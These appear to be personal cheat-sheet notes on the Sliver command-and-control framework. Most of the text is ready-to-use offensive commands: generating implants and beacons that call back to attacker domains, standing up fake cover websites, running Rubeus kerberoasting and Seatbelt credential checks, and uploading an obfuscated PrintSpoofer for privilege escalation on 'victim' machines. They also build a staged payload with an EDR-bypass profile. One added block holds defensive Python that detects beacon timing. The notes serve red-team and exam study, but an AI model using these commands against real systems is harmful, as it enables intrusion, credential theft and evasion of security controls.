# Sliver
Sliver's a rad C2

## Resources that help me make sense of Sliver
* [Tutorial: Create a MacroPack Pro Sliver stager with AV bypass](https://www.youtube.com/watch?v=2u74Ig8cUVY)
* [Passing the OSEP exam using Sliver](https://bishopfox.com/blog/passing-the-osep-exam-using-sliver)
* [Tutorial: Sliver C2 with BallisKit MacroPack and ShellcodePack](https://blog.balliskit.com/tutorial-sliver-c2-with-balliskit-macropack-and-shellcodepack-452e94c24b19)

## Install Sliver

### Linux one-liner
```
curl https://sliver.sh/install | sudo bash
```

With dependencies (if not already installed):

```
sudo apt install mingw-w64
```

### With single binary
```
cd ~/
wget https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-server_linux
chmod +x sliver-server_linux
```

### Install certbot (optional, if you want to integrate with Let's Encrypt)
```
sudo apt install certbot -y
sudo certbot certonly

# I like this method because I port-forward 80/443 to my internal host, then choose
# option 1 (temporary web server) and fill out the rest of the fields to generate my cert.
#
# Copy the key files to the home folder to make them easier to access later:
#
# sudo cp /etc/letsencrypt/live/domain.com/fullchain.pem ~/
# sudo cp /etc/letsencrypt/live/domain.com/privkey.pem ~/
#
# Adjust permissions so your basic "kali" or whatever user can see these files:
# sudo chown sevminsec:sevminsec /home/sevminsec/privkey.pem /home/sevminsec/fullchain.pem
# sudo chmod 640 privkey.pem fullchain.pem
```

## Run Sliver
```
sudo ./sliver-server_linux
```

## Install the armory
(At a sliver shell)

```
armory install all
```

### Armory "must haves"
**Certify**  
```
# Install it
armory install certify

# Basic run
certify -- find /vulnerable
```

**Rubeus**  
```
# Install it
armory install rubeus

# Find Kerberoastable users
rubeus -- kerberoast /nowrap
```

**Seatbelt**  
```
# Install it
armory install seatbelt

# Useful checks
seatbelt -- DotNet
seatbelt -- Antivirus
seatbelt -- WindowsDefender
seatbelt -- LocalUsers
seatbelt -- LogonSessions
seatbelt -- CredentialFiles
seatbelt -- ChromiumPresence
seatbelt -- KeePassPresence
seatbelt -- TokenPrivileges
seatbelt -- PowerShellHistory
seatbelt -- ProcessCreationEvents
seatbelt -- NetworkShares
seatbelt -- ScheduledTasks
seatbelt -- Services
seatbelt -- UAC

# Interesting files
seatbelt -- InterestingFiles
seatbelt -- InterestingProcesses

# Save output to file
seatbelt --save -- -group=all
```

**Sharphound**  
```
# Install it
armory install sharp-hound-4

# Basic collection - will create a file called something like 20260311170832_filename.zip
sharp-hound-4 -s -t 300 -- -c all --zipfilename filename
```

## IMPLANTS

### Generate a general mtls implant
```
generate --mtls domain.dom:8888 --format shellcode --arch amd64 --skip-symbols --save splinter.bin --name ETPHONEHOME
```

### Generate a general HTTPS implant
```
generate --http https://10.7.10.253:8090 --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME
```

### Generate an HTTPS implant with a custom domain
```
generate --http yourdomain.ru --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME
```

### Delete an implant
```
implants rm NAME-OF-IMPLANT
```

!!!tip
You might also have to delete disk-level remnants. For example, if you previously made an implant called *ETPHONEHOME* and then try to make another one with the same name, Sliver might complain like this:

```
[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[!] rpc error: code = Internal desc = rename import dir: target exists: /root/.sliver/slivers/windows/amd64/etphonehome/src/runc/cgroup
```

In that case, nuke it from disk (at a regular command prompt) with:

```
sudo rm -rf /root/.sliver/slivers/windows/amd64/etphonehome
```
!!!

## Start a general listener
```
https --lhost 10.7.10.253 --lport 8090
```

### Start a listener with a custom domain
```
https --domain example.com
```

## Generate a fake Web site to go along with your HTTPS listener
First make a `~/www` folder containing your `index.html`, and then:

```
websites add-content --website fake-blog --web-path / --content www/index.html
```

*Note: the `fake-blog` name is referenced below if you set up an HTTPS listener with a custom domain and specific fake content.*

### Starting an HTTPS listener with a custom domain WITH a pre-generated Let's Encrypt cert AND static content on your fake site
```
https --domain yourdomain.net.ru.edu.lol --cert ./fullchain.pem --key ./privkey.pem --website fake-blog
```

## Establishing sessions with victim machines
From the victim system, find a way to run your `beacon.exe`. It will "phone home" to Sliver C2. To "upgrade" to a higher-privilege shell, upload an obfuscated `printspoofer.exe`:

```
# Switch to the session that was spawned
use xxx
upload /home/youruser/notprintspoofer.exe c:\\users\\public\\nps.exe
```

Then run it:
```
execute c:\\users\\public\\nps.exe -c c:\\users\\public\\your-original-beacon.exe
```

## Interacting with sessions

### Run BloodHound
```
# Args after "--" go to SharpHound itself (same as the -c all / --zipfilename form above)
sharp-hound-4 -- -c all --outputdirectory 'c:\users\public'
```
!!!tip
Specify `--outputdirectory` because, from what I've found, by default it tries to write to `c:\windows\system`, which will be problematic if you're not a full local admin. Plus I don't want to clutter that directory up with a bunch of garbage.
!!!

Find and download it:
```
ls *.zip
download 2025blahblah.zip
```

## Kill all dead sessions (marked as [DEAD])
```
sessions -C
```

## BEACONS
### Generate one with custom domain
```
generate beacon --http yourdomain.ru --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name BEECONE
```
### Check beacon status
```
beacons
```

### Watch beacons continuously for check in
```
beacons watch
```

### Adjust check-in time of the beacon
```
use xxx

# Reconfigure callback time to 200s with an 11s jitter
reconfigure -i 200s -j 11s
```
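The defender's view of the interval/jitter setting above: an added example (not part of these notes or of Sliver) that scans constructed outbound-connection log lines for the near-constant check-in gaps a fixed interval with small jitter produces. The `min_connections` and `max_cv` thresholds are assumed starting points, not tuned values.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound-connection log (not real traffic): "timestamp src dst:port".
# 10.7.10.15 reaches 203.0.113.5 about every 200s; 10.7.10.20 is ordinary browsing.
SAMPLE_LOG = """\
2026-03-11T22:04:17Z 10.7.10.15 203.0.113.5:443
2026-03-11T22:07:40Z 10.7.10.15 203.0.113.5:443
2026-03-11T22:11:06Z 10.7.10.15 203.0.113.5:443
2026-03-11T22:14:22Z 10.7.10.15 203.0.113.5:443
2026-03-11T22:17:45Z 10.7.10.15 203.0.113.5:443
2026-03-11T22:21:01Z 10.7.10.15 203.0.113.5:443
2026-03-11T22:05:02Z 10.7.10.20 198.51.100.7:443
2026-03-11T22:05:03Z 10.7.10.20 198.51.100.7:443
2026-03-11T22:31:19Z 10.7.10.20 198.51.100.7:443
"""

def parse_log(text):
    """Return (src, dst, datetime) tuples, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, src, dst = line.split()
            events.append((src, dst, datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")))
    return events

def interarrival_seconds(events):
    """Group connections by (src, dst) and return the gaps between consecutive ones."""
    stamps = defaultdict(list)
    for src, dst, ts in events:
        stamps[(src, dst)].append(ts)
    return {pair: [(b - a).total_seconds() for a, b in zip(sorted(t), sorted(t)[1:])]
            for pair, t in stamps.items()}

def find_beacons(events, min_connections=5, max_cv=0.15):
    """Flag pairs whose gaps are nearly constant: a fixed sleep with a small jitter
    (like the 200s/11s beacon above) keeps stdev/mean far below max_cv, while
    interactive traffic has wildly varying gaps."""
    hits = {}
    for pair, gaps in interarrival_seconds(events).items():
        if len(gaps) < 2 or len(gaps) + 1 < min_connections or mean(gaps) <= 0:
            continue
        cv = pstdev(gaps) / mean(gaps)
        if cv <= max_cv:
            hits[pair] = {"connections": len(gaps) + 1,
                          "mean_interval": round(mean(gaps), 1), "cv": round(cv, 3)}
    return hits
```

Run `find_beacons(parse_log(SAMPLE_LOG))` to see only the 10.7.10.15 pair flagged; the browsing host has too few connections and far too irregular gaps.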

### Check pending tasks
```
tasks
```

## PROFILES
*Under construction*

### Generate profile
```
profiles new beacon --http domain.com --format shellcode --disable-sgn --skip-symbols bee
```

### Add fake blog
```
websites add-content --website fake-blog --web-path / --content www/index.html
```

### Stand up domain with HTTPS
```
https --domain domain.com --cert ./fullchain.pem --key ./privkey.pem --website fake-blog
```

### Stage a listener
```
stage-listener --url https://yourdomain.com:8080 --profile bee
```

### Generate the profile
```
profiles generate bee
```

### Setup a staged payload with shellcodepack
```
echo "https://domain.com:8080/name-doesnt-matter.woff" | shellcode_pack.exe -t HTTPS_STAGER -G preloads\yourshellcode.bin --bypass-profile .\bypass_profiles\edrbypass.json
```

## Start/restart sliver
```
sudo systemctl start sliver
```

## Sliver quick reference for system interaction
Find basic info about the session:
```
[localhost] sliver (etphonehome) > info

        Session ID: a07faa10-3584-4205-88f3-e1c1ad0ff400
              Name: etphonehome
          Hostname: dc-vil
              UUID: cb7bb9dd-833f-4521-9614-dab4560d794d
          Username: NINJA\localuser
               UID: S-1-5-21-11790880-2535113846-25489808-1000
               GID: S-1-5-21-11790880-2535113846-25489808-513
               PID: 2984
                OS: windows
           Version: Server 2016 build 17763 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: https://domain.domain
    Remote Address: 1.2.3.4:50737
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Wed Mar 11 22:04:17 UTC 2026 (8m31s ago)
      Last Checkin: Wed Mar 11 22:12:47 UTC 2026 (1s ago)
```

Logged on user:
```
sa-whoami
sa-netloggedon
```

## Quick reference (for me to quickly get up and running with a custom domain with HTTPS listener and obfuscated payload)
```
# generate the thing
generate --http custom.domain --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME

# start listening
https --domain custom.domain
```
